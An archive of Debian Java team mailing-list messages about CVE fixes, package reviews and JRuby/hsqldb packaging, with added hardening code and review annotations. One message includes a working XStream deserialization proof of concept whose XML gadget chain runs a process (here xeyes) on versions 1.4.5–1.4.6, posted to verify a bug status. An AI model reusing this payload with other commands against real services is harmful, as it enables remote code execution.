Bug#893663: freeplane: CVE-2018-1000069 XXE vulnerability

2018-04-11 Thread Sébastien Delafond
On Apr/10, Felix Natter wrote:
> Yes and no. On jessie the patch did not cleanly apply, so I would have
> had to apply that change manually. Since removing the import has no
> effect on the semantics of the program (as long as it still compiles),
> I was too lazy. It should be ok.

Let's leave it then.

For further contributions, however, please make sure you cleanly
retrofit any patch that doesn't apply as-is: this will reduce the
overhead and questions when reviewing on our side.

> May I ask why the full source must be included?

Because they will be new on security-master.

Cheers,

--Seb

__
This is the maintainer address of Debian's Java team.
Please use debian-j...@lists.debian.org for discussions and questions.


Bug#888316: jackson-databind: CVE-2018-5968

2018-02-10 Thread Sébastien Delafond
On Jan/27, Markus Koschany wrote:
> I have prepared security updates of jackson-databind for Stretch and
> Jessie and would appreciate another look at the patches.
> 
> The fix for CVE-2018-5968 is straightforward. The blacklist is simply
> extended.
> 
> However upstream decided to refactor the code for CVE-2017-17485 and I
> decided to apply the changes to BeanDeserializerFactory.java again
> instead of using the new helper class SubTypeValidator. Here is my
> thought process on how to create the patch based on the solution in
> upstream bug 1855 [1]
> 
> 1. Extend the blacklist. [2]
> 2. Instead of creating a new method validateSubType, I copied the fix
> into checkIllegalTypes in BeanDeserializerFactory again. [3] The behavior
> remains the same. This code catches some specific cases for the spring
> framework.
> 3. I also applied the regression fix in [4] (also mentioned in bug 1855)
> 4. I believe that [5] only applies to the refactored code and since we
> don't use that it is irrelevant for us.

Hi Markus,

thanks a lot for the patches. I've reviewed them, and your approach is
sound: please upload.

Cheers,

--Seb



Bug#857343: #857343: logback deserialization vulnerability

2017-03-28 Thread Sébastien Delafond
On Mar/28, Markus Koschany wrote:
> apparently logback < 1.2.0 is vulnerable to a deserialization issue.
> They announced it on February 8th 2017 but it appears no CVE has been
> assigned yet. [1] Fixing commit is at [2]. The bug reporter claims it is
> the same issue as CVE-2015-6420 but I cannot verify that at the moment.
> Would you like to request a CVE id or shall I take care of it?

It's fine if you take care of it (and loop back to oss-sec once it's
assigned). Thanks a lot!

Cheers,

--Seb



Bug#758086: CVE-2014-3577: Apache HttpComponents hostname verification bypass

2015-04-15 Thread Sébastien Delafond
On Apr/15, Markus Koschany wrote:
> I have prepared a patch for CVE-2014-3577 (commons-httpclient). [1] The
> patch is identical to the Jessie / Sid fix. Do you consider this
> vulnerability important enough for a DSA or do you prefer a point
> release update?

Hi Markus,

this issue was marked no-dsa some time ago (see
https://security-tracker.debian.org/tracker/CVE-2014-3577), so a
point-release update will be the way to go.

Cheers,

--Seb



Bug#780897: wheezy-security update for batik (CVE-2015-0250)

2015-03-26 Thread Sébastien Delafond
On Mar/25, tony mancill wrote:
> I have prepared an update for batik [1] in wheezy to address
> CVE-2015-0250.  Attached is the debdiff.  Please let me know if you
> would like me to upload it.

Hi Tony,

I've reviewed your debdiff and it looks good. Please upload to
security-master-unembargoed, and we'll take it from there. Also, make
sure your package gets built with -sa, as batik will be new on
security-master.

Cheers,

--Seb



Bug#734821: 734821

2014-10-10 Thread Sébastien Delafond
notfixed 734821 1.4.7-1
thanks

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:

  import java.io.IOException;
  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to /pwntester for the PoC
   * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
   */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException {
          // Process spawned by an affected XStream (1.4.5 and 1.4.6, per the note above)
          String process = "/usr/bin/xeyes";
          // A sorted-set whose comparator-less element is a dynamic proxy; the proxy's
          // handler is a java.beans.EventHandler wrapping a ProcessBuilder, and the
          // "start" action is invoked during comparison while the set is rebuilt
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              "<target class=\"java.lang.ProcessBuilder\">" +
              "<command>" +
              "<string>" + process + "</string>" +
              "</command>" +
              "</target>" +
              "<action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
              "</sorted-set>";
          XStream xstream = new XStream(new DomDriver());
          xstream.fromXML(payload);
      }
  }

Cheers,

--Seb
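As an added defender-side example (not part of the message above, nor XStream's own code), this is how the security framework XStream ships since 1.4.7 can be configured to refuse such a document with a type allowlist: everything is denied first, then only the application's own types are re-allowed. The Greeting class, the hardened()/rejects() helpers and both sample documents are constructed here for illustration.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamHardened {
    /** Constructed application type: the only object this endpoint expects. */
    public static final class Greeting {
        String text;
    }

    /** Builds an XStream instance that only unmarshals the allowlisted types. */
    static XStream hardened() {
        XStream xstream = new XStream(new DomDriver());
        // Deny every type first, then re-allow null, primitives and our own types.
        xstream.addPermission(NoTypePermission.NONE);
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Greeting.class });
        xstream.alias("greeting", Greeting.class);
        return xstream;
    }

    /** True when the document names a type outside the allowlist. */
    static boolean rejects(String xml) {
        try {
            hardened().fromXML(xml);
            return false;
        } catch (ForbiddenClassException e) {
            // Thrown by the SecurityMapper as soon as a non-allowlisted
            // class (here java.util.TreeSet for <sorted-set>) is resolved.
            return true;
        }
    }

    public static void main(String[] args) {
        // Constructed sample input: the legitimate document is accepted.
        String ok = "<greeting><text>hello</text></greeting>";
        // Constructed sample input: a document using the same container and
        // handler class as the PoC above, without the rest of the chain.
        String bad = "<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface>"
            + "<handler class=\"java.beans.EventHandler\"/></dynamic-proxy></sorted-set>";
        System.out.println("legitimate document accepted: " + !rejects(ok));
        System.out.println("proxy document rejected: " + rejects(bad));
    }
}
```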



[jruby] Package based on latest upstream

2012-06-18 Thread Sébastien Delafond
Hi fellows,

I've been packaging jruby 1.6.7.2, and would like to upload it quite
soon, in hopes of beating the freeze and having a decently recent
version of jruby in wheezy.

I'm attaching to this email the diff between 1.5.6-3's debian/
directory, and mine, the main change being that I've had to give up on
depending on jars already packaged in Debian, and needed by jruby:
either their versions are too old or too new, but in all cases I
couldn't get jruby to compile and pass its unit tests when using
those. When using the jars shipped in the jruby tarball, building goes
fine and tests do pass, which is reassuring to say the least.

I agree it's a valuable goal to depend on software already packaged in
Debian (instead of re-shipping jars), but I unfortunately don't have
the bandwidth to bring all those third-party packages up-to-date; this
could be tackled later, but having a current jruby in stable for the
next release cycle seemed a more important goal right now.

Please let me know how you feel about this potential upload.

Cheers,

--Seb

PS: I'm not a member of pkg-java-maintainers@d.o, so please include me
explicitly in your replies.

diff -u -r ../jruby-1.5.6/debian/changelog ../jruby-1.6.7.2/debian/changelog
--- ../jruby-1.5.6/debian/changelog	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/changelog	2012-06-01 14:00:39.0 +0200
@@ -1,3 +1,17 @@
+jruby (1.6.7.2-1) unstable; urgency=low
+
+  * New upstream release.
+  * Do not build-depend on older/newer version of Java libraries present
+in unstable, but instead build using those provided by upstream so
+that:
+  1) 1.6.7 can build at all
+  2) all unit tests can pass
+  * Bump-up Standards-Version.
+  * Renamed all patches to ease up insertion of new ones.
+  * Fixed compilation of cext with gcc (see http://jira.codehaus.org/browse/JRUBY-6633)
+
+ -- Sebastien Delafond s...@debian.org  Fri, 01 Jun 2012 14:00:02 +0200
+
 jruby (1.5.6-3) unstable; urgency=low
 
   [Miguel Landaeta]
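Review bot: the second bullet of the new changelog entry says the build now uses the libraries provided by upstream instead of the ones in unstable, but it does not say which libraries are now embedded or how their security updates will reach this package; please list the bundled jars (in the changelog or debian/README.source) and record them as embedded code copies so that a fix in, say, libjffi-java or libasm3-java is also rebuilt here. A smaller point: the sub-bullet reads "1.6.7 can build at all" while the entry is for 1.6.7.2.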
diff -u -r ../jruby-1.5.6/debian/control ../jruby-1.6.7.2/debian/control
--- ../jruby-1.5.6/debian/control	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/control	2012-05-31 11:51:13.0 +0200
@@ -4,13 +4,8 @@
 Maintainer: Debian Java Maintainers pkg-java-maintainers@lists.alioth.debian.org
 Uploaders: Sebastien Delafond s...@debian.org,
  Torsten Werner twer...@debian.org
-Build-Depends: debhelper (= 6.0.7~), default-jdk, ant-optional,
- libasm3-java, libcommons-logging-java, libjarjar-java, libjoda-time-java,
- junit4, libemma-java, libbsf-java, libjline-java, bnd, libconstantine-java,
- netbase, libjgrapht0.8-java, libjcodings-java, libbytelist-java, libjffi-java,
- libjaffl-java, libjruby-joni-java, yydebug, nailgun, libjnr-posix-java,
- libjnr-netdb-java, libyecht-java (= 0.0.2-2~), cdbs
-Standards-Version: 3.9.2
+Build-Depends: debhelper (= 6.0.7~), default-jdk, ant-optional, cdbs
+Standards-Version: 3.9.3
 Homepage: http://jruby.org
 Vcs-Git: git://git.debian.org/git/pkg-java/jruby.git
 Vcs-Browser: http://git.debian.org/?p=pkg-java/jruby.git
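Review bot: the Build-Depends line drops every Java library build-dependency and keeps only debhelper, default-jdk, ant-optional and cdbs, so the package will now be built against pre-compiled jars from the tarball rather than from sources in the archive; 0040-replace-bundled-libraries.patch still exists in the 1.6.7.2 patch directory (see the "Only in" list below), so please check that it does not now replace some bundled jars and not others, and document the remaining bundled jars so that ftp-masters and the security team can see what is shipped.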
@@ -18,7 +13,7 @@
 Package: jruby
 Architecture: all
 Replaces: jruby1.0, jruby1.1, jruby1.2
-Depends: openjdk-6-jre | java6-runtime, ${misc:Depends}, libjffi-jni
+Depends: openjdk-6-jre | java6-runtime, ${misc:Depends}
 Recommends: ri1.8
 Description: 100% pure-Java implementation of Ruby
  JRuby is a 100% pure-Java implementation of the Ruby programming language.
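Review bot: removing libjffi-jni from Depends drops the only architecture-specific runtime dependency of this Architecture: all package, so the native JFFI library must now come from somewhere else; the new 0045-do-not-bundle-all-jffi-jars.patch in the patch list suggests a bundled jffi jar is kept, and it is worth stating which architectures that jar's embedded native library covers, since an Architecture: all package cannot express that limitation.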
diff -u -r ../jruby-1.5.6/debian/links ../jruby-1.6.7.2/debian/links
--- ../jruby-1.5.6/debian/links	2012-01-16 04:23:20.0 +0100
+++ ../jruby-1.6.7.2/debian/links	2012-05-31 11:49:24.0 +0200
@@ -3,4 +3,4 @@
 usr/lib/jruby/bin/jruby.rb  usr/bin/jruby.rb
 usr/lib/jruby/bin/jrubycusr/bin/jrubyc
 usr/lib/jruby/lib/jruby.jar usr/share/java/jruby.jar
-usr/share/ri/1.8/system usr/lib/jruby/share/ri/1.8/system
+
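Review bot: the symlink usr/share/ri/1.8/system -> usr/lib/jruby/share/ri/1.8/system is removed here while the control hunk above still carries Recommends: ri1.8, so either that recommendation is now stale or jruby's ri lookup will no longer find the installed documentation; also, the replacement "+" line only adds a trailing blank line to debian/links, which looks unintended.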
Only in ../jruby-1.5.6/debian/patches: 0001-Fix-shebang-lines.patch
Only in ../jruby-1.5.6/debian/patches: 0002-jruby_home-is-at-a-specific-location-on-Debian.patch
Only in ../jruby-1.5.6/debian/patches: 0003-do-not-install-gems.patch
Only in ../jruby-1.5.6/debian/patches: 0004-replace-bundled-libraries.patch
Only in ../jruby-1.5.6/debian/patches: 0005-ignore-test-failures.patch
Only in ../jruby-1.5.6/debian/patches: 0006-do-not-build-InvokeDynamicSupport.java.patch
Only in ../jruby-1.5.6/debian/patches: 0007-use-unversioned-jarjar.jar.patch
Only in ../jruby-1.6.7.2/debian/patches: 0010-Fix-shebang-lines.patch
Only in ../jruby-1.6.7.2/debian/patches: 0020-jruby_home-is-at-a-specific-location-on-Debian.patch
Only in ../jruby-1.6.7.2/debian/patches: 0030-do-not-install-gems.patch
Only in ../jruby-1.6.7.2/debian/patches: 0040-replace-bundled-libraries.patch
Only in ../jruby-1.6.7.2/debian/patches: 0045-do-not-bundle-all-jffi-jars.patch
Only in ../jruby-1.6.7.2/debian/patches: 0050-ignore-test-failures.patch
Only in ../jruby-1.6.7.2/debian/patches: 

Re: planning (a) hsqldb transition(s)

2012-04-30 Thread Sébastien Delafond
On Apr/30, Rene Engelhard wrote:
> > Hi,
> > 
> > On Fri, Apr 13, 2012 at 04:31:31PM +0200, Rene Engelhard wrote:
> > > so I'd like to upload that to unstable (and adapt libreoffice) if it
> > > happens.
> > > 
> > > But this problem makes me ask
> > > 
> > > Q1) does anyone of your programs using libhsqldb-java have the same
> > > problem? Do we need to wait for them to be patched to upload 1.8.1.x?
> > > 
> > > As you probably noticed, libhsqldb-java is 1.8.x while we have a
> > > libhsqldb2.0-java in experimental (and there's a 2.2.8 released, which I
> > > packaged some days ago and is ready to upload here now that I long
> > > neglected because I didn't care as OOo and LibO *do* need 1.8.x.)
> > > 
> > > Q2) Would you agree that renaming libhsqldb-java to libhsqldb1.8-java
> > > would be worthwhile? We then can upload 2.2.8 as libhsqldb-java. This
> > > needs source uploads of all the above packages, though.
> > > 
> > > Q3) Does anyone want to overtake libhsqldb-java (2.x) then? I am only
> > > interested in 1.8.x for OOo/LO.
> > > 
> > > Q4) does anyone need 2.0 *and* 2.2 be different? Anything working with 2.0
> > > and not 2.2? (Doubt that, but better safe than sorry) - in that case
> > > we need to have libhsqldb1.8-java, libhsqldb2.0-java and the new
> > > libhsqldb-java)
> > 
> > And no one except tillea (for debian-med)[1] answered here. pkg-java,
> > Sebastien?
> 
> Two weeks later, and roughly one month before the freeze? PING? Can you
> (= pkg-java and Sebastien!) please answer?

Sorry for the lag, real life has been a bit hectic lately. I'm fine
with your upload plan, and will make my paros package depend on
libhsqldb1.8-java once you upload it. paros is not maintained upstream
anymore, but I will be able to take care of its patching to ensure
1.8.1.x compatibility, if need be.

Cheers,

--Seb



Re: JRuby packaging

2011-09-13 Thread Sébastien Delafond
Hi Alex,

a while ago I transferred maintenance of jruby over to the Debian Java
Maintainers, whom I cc'ed to this email. They'll probably be able to
tell you more...

Cheers,

--Seb

On Sep/12, Alex Young wrote:
> Hi there,
> 
> I'm emailing you because your name is on the Debian jruby-1.5.1
> package.  Do you know if there is a current attempt to package a
> more recent version of jruby than 1.5.1?  If so, could you point me
> in the right direction?  If not, it's just possible I might be able
> to convince my employer to stump up some manpower to take it on.
> 
> Thanks,
> -- 
> Alex
> 



Re: [packaging] JRuby in Debian

2010-12-06 Thread Sébastien Delafond
Hi Thomas,

jruby is now being packaged by the Debian Java Maintainers, whose main
goal is to get jruby back into main again.

I'm cc'ing the team to this email, as I'm sure they'll be interested in
working closely with such a responsive upstream ;)

Cheers,

--Seb

On Dec/02, Thomas E Enebo wrote:
> Hello,
> 
> I know in the past you have been helping us to get JRuby
> installed/up-to-date/our-bad-dependencies in Debian.  I was wondering
> if you are interested in helping us update JRuby whenever we put out
> a new release.  I would send an email out when a release occurs and
> then you would go through whatever process is needed to get it into
> Debian.
> 
> There were some issues in the past with our dependencies and so we
> of course will also help do our best to help straighten those out so
> this can be a more painless process.  Are you game?  Is there another
> person we should be talking to that you know of?  We are really
> interested in trying to better coordinate releases of JRuby on various
> distributions...
> 
> -Tom
